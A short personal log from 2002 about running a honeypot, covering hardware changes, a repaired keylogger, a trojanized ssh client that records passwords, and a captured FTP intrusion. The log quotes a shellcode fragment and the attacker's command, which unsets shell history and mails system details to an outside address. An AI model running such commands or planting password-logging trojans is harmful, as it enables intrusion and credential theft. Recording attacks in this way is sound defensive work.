Unknown1
At this moment (July 31, 2002) my third honeypot has
been running for some days. It's changed somewhat. First it was equipped
with a 40GB harddrive, now it only has 4. First it had an 3com ISA networkcard,
now it has a cheap-ass PCI thingy. The latter 'upgrade' was because I
couldn't get RedHat7.1 stable with the 3com card. I have to admit I really
didn't try hard though.
Not only the hardware and OS have changed. I hacked up the keylogger because
it didn't work well. The first problem I encountered was that the logger
didn't flush the outputfile; when the kiddos logged out, the buffered
output was never written to disk. The second problem was that it crashed.
The new version seems to work better, although it still has to be tested
out 'in the field'. Not only did I fix the logger, I also trojanized 'ssh',
the SSH-client. It now logs passwords to a 'hidden' file. Can come in
handy :)
On Sunday Aug 11th, at 12:20 CEST, somebody connected
to port 21 and sent some stuff down the pipe. This stuff included:
3F3jT'=Rh/D=XjTj(XjXRhn/shh//biRSunset
HISTFILE;uname -a | mail xrecmsg@hotmail.com; mail xrecmsg@hotmail.com;exit
Now let's wait and see if someone checks his mail regularly.
Well, somebody did check his mail. The guy rootkitted my system and began
scanning for vulnerable ftpd's right away. His rootkit broke 'ls' and
'find', which both segfaulted without giving any useful output. This would
immediately arouse suspicion to any sysadmin, but this unknown kiddo didn't
even notice it. Combined with the scanning he did I disconnected the system
almost directly after the hack. He didn't do anything interesting with
the system, so I never looked into it. Next time I will.
|